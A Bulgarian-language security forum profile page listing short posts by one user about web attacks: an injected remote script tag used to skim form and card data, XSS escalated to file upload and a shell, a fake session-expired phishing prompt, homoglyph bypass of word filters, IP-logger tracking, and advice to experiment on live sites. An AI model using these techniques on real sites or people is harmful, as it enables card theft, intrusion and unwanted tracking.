Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

TheZero

Потребители
  • Мнения

    33
  • Присъединил/а се

  • Последно посещение

  • Days Won

    6

TheZero last won the day on Март 23

TheZero had the most liked content!

Обществена Репутация

17 Good

Social Info

1 Последовател

Относно TheZero

  • Ранг
    Начинаещ

Последни посетители

526 профилни разглеждания
  1. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  2. Проверете, дали са ви хакнали? Публикуваха списък на 7,695,066,389 хакнати акаунти. Това е световен рекорд от всички времена. На сайта https://haveibeenpwned.com/ може да проверите, дали и вашият e-mail адрес е компрометиран. Добре е, да си смените веднага паролите. На същият сайт има доста подробности около пробивите. Също така, може да се свали и списъка на паролите. https://haveibeenpwned.com/Passwords
  3. TheZero

    Комуникация

    Колеги, добре е, че държите на българското, но защо не си прегледате никовете? Май и те не са български.
  4. Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
  5. TheZero

    Ограбиха ме!

    Това, би трябвало да ти помогне: https://www.malwarebytes.com/mwb-download/
  6. Наистина гигантска база данни за MD5 hashes. https://hashkiller.co.uk/md5-decrypter.aspx
  7. TheZero

    Ограбиха ме!

    Ако е така, както описваш, това е признак на шпионски софтуер. Използвай друго устройство за смяна на паролите, докато си изчистиш компютъра/телефона. cybercrime.bg няма да ти помогнат, за тях това са дреболии.
  8. Бях чел нещо подобно и за хиляди е-магазини натряскани с промени в javascript файловете. Защо ли не си мушкат злобните скриптове в server side файлове? Така поне остават - "невидими". Явно имат оправдателна причина. Попадал съм на шмекерии в php файлове за крадене на пресни данни, които пак препращат плячката навън. Големи изобретателности!
  9. Ето това е истината! Единствено "на живо" се правят експерименти. Тестове на localhost не означават нещо особено.
  10. Ха, интересно! Все пак има напредък, щом са ти обърнали внимание и дори са те award-нали с 100 £. Като стане дума за XSS, обикновено се мисли, че най-много може да се задигне админ сесията. Истинското шоу става след като инжектнатият javascript сочи към payload, предизвикващ CSFU (Cross-Site File Upload). И бууум - имаш качен shell. Хаха, това с инжектирането на <div> го имаше и на № 1 българската емейл платформа, разбира се id-то на div-а е дефинирано за цялата страница. Жертвата си отваря полученият имейл и що да види - "Сесията ви изтече, влезте отново!" Смях голям....
  11. Пробвай http://localhost/~jertva Като замениш localhost с IP-то на сървъра и jertva с юзъра. Късмет!
  12. Най-вероятно на повечето от вас се случвало да срещне цензура на определени думи , когато се опитва да напише коментар под някоя статия, пост и така нататък в интернет. Най-малкото сте забелязвали зведички (******), вместо определена дума, която предполагате, че е филтрирана. Обикновено се поставят тирета или празни пространства между сричките, но това не е истинско решение. За щастие или нещастие, повечето сайтове са на UTF-8 charset и това може да позволи видимо заобикаляне на забраните. Да приемем, че думите - глупак, свиня, простак, са в черен списък и на тяхно място се появяват ******. В такъв случвай се търси визуален еквивалент на дадена буква от кирилицата в латиницата. В "глупак" заместваме буквата "а" с латинското "a". В "свиня" вместо "с" поствавяме "c" (це) от кирилицата, а в простак можем да заменим "р", "о", "с", и "а". Както виждате цедилката се пропуква доста лесно. Не се и досещам за някакви мерки и защита.
  13. На забравена парола, изписва положителен отговор на произволни мейл адреси. Допуснах, че може да приеме и HTML/javascript тагове - резултат отрицателен.
  14. Свалили те, цървули. Ако правилата на форума позволяваха, бих направил демо как се обезобразява "свалената" жертва, барабар с източника на глупавата "новина".
  15. Има безплатни сайтове, които дават възможност за проследяване на IP адресите. Търси IP logger в google. Генерираш линк и изпращаш на тормозещите, след което сравняваш IP адресите им.
×
×
  • Създай нов...

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.